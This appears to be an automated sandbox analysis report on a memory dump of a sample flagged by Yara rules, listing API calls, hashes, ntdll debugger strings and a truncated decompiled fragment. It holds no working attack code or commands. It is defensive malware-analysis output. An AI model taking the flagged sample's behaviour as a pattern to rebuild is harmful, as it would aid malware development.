                                                                    • Instruction ID: 385ed3339d784c7e7a876af1a96ddb15dfafd44966e5bf625854e63aa509c44e
                                                                    • Opcode Fuzzy Hash: c32f5796ddaf866f59db34fea60258a467219aa5b305847553aa14afb13a1566
                                                                    • Instruction Fuzzy Hash: F301BBB2204108AFCB08CF98DC95EEB37A9AF9C354F15824CFA0DD7251D630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: 05de2879a2fc0fae214c25d7b9897b399c80e918a92176773526dbc11e9f5f11
                                                                    • Instruction ID: ce5480904a668c4d927718b093031cb1577561652f4e279af9e5e15bade548e6
                                                                    • Opcode Fuzzy Hash: 05de2879a2fc0fae214c25d7b9897b399c80e918a92176773526dbc11e9f5f11
                                                                    • Instruction Fuzzy Hash: BCF01CB5200118ABDB14DF89DC81EE777A9EF88354F15864DFE1997281C630E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0e66ef57ee4c6d8aaaa42c7b4bf260577db3d7e0d72030048e528aa598718bb2
                                                                    • Instruction ID: b7e012df7334e707b9f99e4aa8eaf45e74de95ba84de21aa1b2f5a42d17ce743
                                                                    • Opcode Fuzzy Hash: 0e66ef57ee4c6d8aaaa42c7b4bf260577db3d7e0d72030048e528aa598718bb2
                                                                    • Instruction Fuzzy Hash: 0E900265711004030105A59A0704507004AA7D5395351C022F1405551CDB7188616162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 63b8ef6fadca6af7a99b0039086e13c07e1d873560098cc0129fd80580459090
                                                                    • Instruction ID: bc6151cd61c5060c008c967ca83ef6052e272a11ccf98d00745dfc333503cd5a
                                                                    • Opcode Fuzzy Hash: 63b8ef6fadca6af7a99b0039086e13c07e1d873560098cc0129fd80580459090
                                                                    • Instruction Fuzzy Hash: 279002B170100802D140719A44047460009A7D0345F51C012A5454555ECBA98DD576A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3d7d811828912933a61f0796c87fd03306c90e5d9a7eeb7c1561557d559227de
                                                                    • Instruction ID: 35f484ba2a69007cf2119bf5de76d9d72af46e27584b94fa702d725471f5c0e2
                                                                    • Opcode Fuzzy Hash: 3d7d811828912933a61f0796c87fd03306c90e5d9a7eeb7c1561557d559227de
                                                                    • Instruction Fuzzy Hash: 349002A1702004034105719A4414616400EA7E0245B51C022E1404591DCA7588917166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 273b98960973de6e3274810f794e810ff8f267115b20bf12ba80a318fe4d8312
                                                                    • Instruction ID: b200047fc456d65fea7faa11cf6cb6e753ada24f2fe4dbf64d9509a81f7f1a52
                                                                    • Opcode Fuzzy Hash: 273b98960973de6e3274810f794e810ff8f267115b20bf12ba80a318fe4d8312
                                                                    • Instruction Fuzzy Hash: 849002A174100842D100619A4414B060009E7E1345F51C016E1454555DCB69CC527167
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0bc433222301c4eb5f0a55f0490aaf6dffeee066129d31ed9c3d1ff117443498
                                                                    • Instruction ID: f37ce085e701edd0894eee248fa200d4fe9e246822e07db3aeafd287eb9ce3a0
                                                                    • Opcode Fuzzy Hash: 0bc433222301c4eb5f0a55f0490aaf6dffeee066129d31ed9c3d1ff117443498
                                                                    • Instruction Fuzzy Hash: 1C900261742045525545B19A4404507400AB7E0285791C013A1804951CCA769856E662
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 765cdadfae6779529f30d1ef333eec8d9b614506bf0fcf30dc8f9637efde2e1e
                                                                    • Instruction ID: 85974c54c8aa7302d6a063efdad1b2fd99d82516394c27686197ac2388a93f6d
                                                                    • Opcode Fuzzy Hash: 765cdadfae6779529f30d1ef333eec8d9b614506bf0fcf30dc8f9637efde2e1e
                                                                    • Instruction Fuzzy Hash: ED90027170100813D111619A4504707000DA7D0285F91C413A0814559DDBA68952B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0ef6f225b60efb5c27f078df9ed721a5fa37dad70a29923fc20dfa191b4f9a87
                                                                    • Instruction ID: dfb4790e3dfcfdaadeb06b177b591cf420df29fe47d9223d9c2bce0950b356da
                                                                    • Opcode Fuzzy Hash: 0ef6f225b60efb5c27f078df9ed721a5fa37dad70a29923fc20dfa191b4f9a87
                                                                    • Instruction Fuzzy Hash: 4D900261B0100902D101719A4404616000EA7D0285F91C023A1414556ECF758992B172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 919db361839c7283b961dc20893fdeb236220b026bf4c67242d94481d6a6906d
                                                                    • Instruction ID: 3c21b096298113da3f600ce5f7832d727655afc20ff37c42dfe06327caa5fd3f
                                                                    • Opcode Fuzzy Hash: 919db361839c7283b961dc20893fdeb236220b026bf4c67242d94481d6a6906d
                                                                    • Instruction Fuzzy Hash: 7D90027170100802D10065DA54086460009A7E0345F51D012A5414556ECBB588917172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a2417fe76504b0fdc3144d406141f008a498f5d980f972869c7cfab4b3b53f89
                                                                    • Instruction ID: 2da7881ebe14bb094abdfabe9ce91b27fc50c1a813d84caa31e7f3da5077b1b8
                                                                    • Opcode Fuzzy Hash: a2417fe76504b0fdc3144d406141f008a498f5d980f972869c7cfab4b3b53f89
                                                                    • Instruction Fuzzy Hash: 8690027171114802D110619A84047060009A7D1245F51C412A0C14559DCBE588917163
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1d0701652e589cef01a6a5b0834b534aeb0820379746d93f79bcc58559f42bdb
                                                                    • Instruction ID: cb04141586c5be046972351287e07a57a181b9b31302d282b389e0f282358e8d
                                                                    • Opcode Fuzzy Hash: 1d0701652e589cef01a6a5b0834b534aeb0820379746d93f79bcc58559f42bdb
                                                                    • Instruction Fuzzy Hash: DC90026971300402D180719A540860A0009A7D1246F91D416A0405559CCE6588696362
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c24e25797a5aaf9783cdb84d7bd0a228a6217a5de0197aabd7bc8c18116c6bcc
                                                                    • Instruction ID: f85a82e543c53f19c64fb3e0f46d79c1c991ebc8e62b050bebfc9fcc98f6aa91
                                                                    • Opcode Fuzzy Hash: c24e25797a5aaf9783cdb84d7bd0a228a6217a5de0197aabd7bc8c18116c6bcc
                                                                    • Instruction Fuzzy Hash: F090026170100403D140719A54186064009F7E1345F51D012E0804555CDE6588566263
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b9e975b2d333b0b6c20884e33d273eb288250906c3eb4e834e0b8f8fb03bf340
                                                                    • Instruction ID: 4afbf3bf635daec4128fd2034003d8557e9f1f95bb4308fb5e9cdec574f333f9
                                                                    • Opcode Fuzzy Hash: b9e975b2d333b0b6c20884e33d273eb288250906c3eb4e834e0b8f8fb03bf340
                                                                    • Instruction Fuzzy Hash: A890026171180442D20065AA4C14B070009A7D0347F51C116A0544555CCE6588616562
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d4ff13e45342b5a1b8f2bbd80e4be0d123f7f95b57e971b42e5d3d364804e1c7
                                                                    • Instruction ID: ecff8c33947a2154d74f557b333e1a0029af85e7139962d4d3318d1a4e41b29f
                                                                    • Opcode Fuzzy Hash: d4ff13e45342b5a1b8f2bbd80e4be0d123f7f95b57e971b42e5d3d364804e1c7
                                                                    • Instruction Fuzzy Hash: 3B90027170100C02D180719A440464A0009A7D1345F91C016A0415655DCF658A5977E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 63f7bb30f0782adda60074fd64a838d8ce59a94066292043782be27160081ee5
                                                                    • Instruction ID: 875e50270aabe396b8343472b5b90508b3ff5f0f6d4d8038d12458e0898d4a99
                                                                    • Opcode Fuzzy Hash: 63f7bb30f0782adda60074fd64a838d8ce59a94066292043782be27160081ee5
                                                                    • Instruction Fuzzy Hash: C490027170140802D100619A481470B0009A7D0346F51C012A1554556DCB75885175B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 28fd277bd1287d029d8474af4e4f168da8f9096dca3200e21d1ddabd2aaa3e8a
                                                                    • Instruction ID: 8c43a569e6f2d803d4ca1888220c024f6b9fc80eebfe25833461b35df03d72a2
                                                                    • Opcode Fuzzy Hash: 28fd277bd1287d029d8474af4e4f168da8f9096dca3200e21d1ddabd2aaa3e8a
                                                                    • Instruction Fuzzy Hash: 97900261B0100442414071AA88449064009BBE1255751C122A0D88551DCAA9886566A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a97a25c2e77cabda2c762ded332e582d840dc70b4890ad31dfdd73d40b861070
                                                                    • Instruction ID: 5fecb1f53396ab3e2f13e96cc8244ec103583e1e0287140babae375673ce8b88
                                                                    • Opcode Fuzzy Hash: a97a25c2e77cabda2c762ded332e582d840dc70b4890ad31dfdd73d40b861070
                                                                    • Instruction Fuzzy Hash: BD90027170108C02D110619A840474A0009A7D0345F55C412A4814659DCBE588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateFree
                                                                    • String ID:
                                                                    • API String ID: 2488874121-0
                                                                    • Opcode ID: 6ff80dcb481a209e0d9783a40e1d31070ded238351805f17418e0a3198a2af03
                                                                    • Instruction ID: e35f81ec430e903478ed3fd621af9c9e9b745fbb59e88449a9a2cd6a7735a0b2
                                                                    • Opcode Fuzzy Hash: 6ff80dcb481a209e0d9783a40e1d31070ded238351805f17418e0a3198a2af03
                                                                    • Instruction Fuzzy Hash: A5F0C2B82087856FD710EF69EC808EB7795AF8531C754894EE88983303EA35D8568BB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 88bb45e7614d21acd51da27af976991c2a294defad2c4887a2bfd009b506f306
                                                                    • Instruction ID: e5e253baeb12525dde2dbbbf2885a3ae56325cda8349ec66a744d5e7f8c762a0
                                                                    • Opcode Fuzzy Hash: 88bb45e7614d21acd51da27af976991c2a294defad2c4887a2bfd009b506f306
                                                                    • Instruction Fuzzy Hash: 8CB09B71D014C5C5D751D7A54608717794477D0745F16C053D1460652F4778C095F5B6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Strings
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 014CB352
                                                                    • *** enter .cxr %p for the context, xrefs: 014CB50D
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014CB3D6
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 014CB48F
                                                                    • <unknown>, xrefs: 014CB27E, 014CB2D1, 014CB350, 014CB399, 014CB417, 014CB48E
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 014CB2F3
                                                                    • Go determine why that thread has not released the critical section., xrefs: 014CB3C5
                                                                    • a NULL pointer, xrefs: 014CB4E0
                                                                    • *** enter .exr %p for the exception record, xrefs: 014CB4F1
                                                                    • The instruction at %p referenced memory at %p., xrefs: 014CB432
                                                                    • The resource is owned exclusively by thread %p, xrefs: 014CB374
                                                                    • The resource is owned shared by %d threads, xrefs: 014CB37E
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 014CB323
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 014CB314
                                                                    • The critical section is owned by thread %p., xrefs: 014CB3B9
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 014CB305
                                                                    • write to, xrefs: 014CB4A6
                                                                    • *** Inpage error in %ws:%s, xrefs: 014CB418
                                                                    • *** then kb to get the faulting stack, xrefs: 014CB51C
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 014CB53F
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 014CB2DC
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014CB38F
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014CB39B
                                                                    • read from, xrefs: 014CB4AD, 014CB4B2
                                                                    • This failed because of error %Ix., xrefs: 014CB446
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 014CB476
                                                                    • an invalid address, %p, xrefs: 014CB4CF
                                                                    • The instruction at %p tried to %s , xrefs: 014CB4B6
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 014CB484
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 014CB47D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: dc707d193df37e65d76ad71ee4edb252f5f7e72cab2b3123c2d106c25b36d28b
                                                                    • Instruction ID: 551d52b07b18e2c8958045428b3ae859bb2382961e2cf6fb210b721c1f93e8ff
                                                                    • Opcode Fuzzy Hash: dc707d193df37e65d76ad71ee4edb252f5f7e72cab2b3123c2d106c25b36d28b
                                                                    • Instruction Fuzzy Hash: 5C81F579A00210FBDB265A8B9C46D7F7F25EF76A95F41406FF5042F272E2718412C672
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E014D1C06() {
                                                                    				signed int _t27;
                                                                    				char* _t104;
                                                                    				char* _t105;
                                                                    				intOrPtr _t113;
                                                                    				intOrPtr _t115;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr _t120;
                                                                    
                                                                    				_t105 = 0x13f48a4;
                                                                    				_t104 = "HEAP: ";
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0141B150();
                                                                    				} else {
